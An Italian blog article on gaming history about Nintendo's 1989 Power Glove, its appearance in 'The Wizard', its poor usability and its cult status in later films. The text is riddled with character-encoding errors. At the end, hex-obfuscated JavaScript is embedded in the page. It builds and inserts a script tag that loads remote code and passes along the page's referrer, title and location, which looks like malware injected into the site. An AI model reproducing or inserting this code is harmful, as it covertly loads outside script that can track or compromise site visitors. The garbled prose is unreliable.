Storia dei Videogiochi

Il guanto del potere

Gli appassionati di videogiochi di lunga data sicuramente riconosceranno subito la scena che segue, tratta dal film “Il piccolo grande mago dei videogames”, o per chiamarlo come i puristi “The Wizard”,Ai?? mentre i piA? cinici lo chiameranno “la vetrina di Nintendo”.

Proprio in questo film del 1989 verrAi?? mostrato in azione il magico (per i tempi) Power Glove e presentato in anteprima assoluta e totalmente inaspettata l’attesissimo Super Mario Bros 3.

Nintendo, con le sue trovate piA? o meno riuscite, A? sempre stata un’azienda pioniera nello sviluppo di nuovi modi per vivere le esperienze videoludiche, sfociate nell’ultimo grande successo che ha travolto il mondo con il Wii; ampliando il mercato dei videogiochi anche verso chi ha sempre trovato difficile l’approccio con questo tipo di intrattenimento.

All’epoca, tra il 1982 e il 1990, il NES, acronimo di Nintendo Entertainment System era sinonimo di Videogioco, primato che nel decennio precedente era riservato ad Atari.

La tecnologia del Power Glove prometteva un’esperienza di gioco piA? naturale e fluida, con la possibilitAi?? di programmare i comandi per adattarli a qualsiasi esperienza di gioco, ma obbligava il giocatore a montare una goffa struttura intorno al televisore, che emetteva dei segnali a ultrasuoni captati dal guanto per avere un riferimento spaziale e permettere al giocatore di interagire entro le tre dimensioni. Inoltre ulteriori sensori all’altezza delle articolazioni associava delle funzioni al movimento delle dita.

Il risultato perA? A? un aggeggio pesante, scomodo e impreciso (quando si dice: “A? proprio un film” se ci riferiamo a The Wizard…), ben lontano dalla fluiditAi?? promessa, spesso non riconosceva i movimenti o lo faceva in ritardo, costringendo spesso il giocatore a usare i tasti sul guanto come se fosse un pad. Un vero incubo.

Il tipico guanto uncinato di Freddy Krueger si trasforma in un Power Glove nel film Nightmare 6
Il tipico guanto uncinato di Freddy Krueger si trasforma in un Power Glove nel film Nightmare 6

Il Power Glove compare lungo il viale del tramonto del NES, ma le sue proprietAi?? fantascientifiche per il tempo gli hanno permesso di far parlare di molto sA?. I giocatori che hanno avuto modo di utlizzarlo lo ricordano con affetto (e con qualche parolaccia), ma soprattutto A? diventato un cult postumo del periodo. Lo dimostrano numerose citazioni anche molto attuali, come un elemento caratteristico per un personaggio nel recentissimo Kung Fury, film indipendente che A? anche una dichiarazione d’amore al sano trash anni 80.

kung-fury-2
Il personaggio di Hackerman nel film Kung Fury. Il suo nome A? tutto un programma.
\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}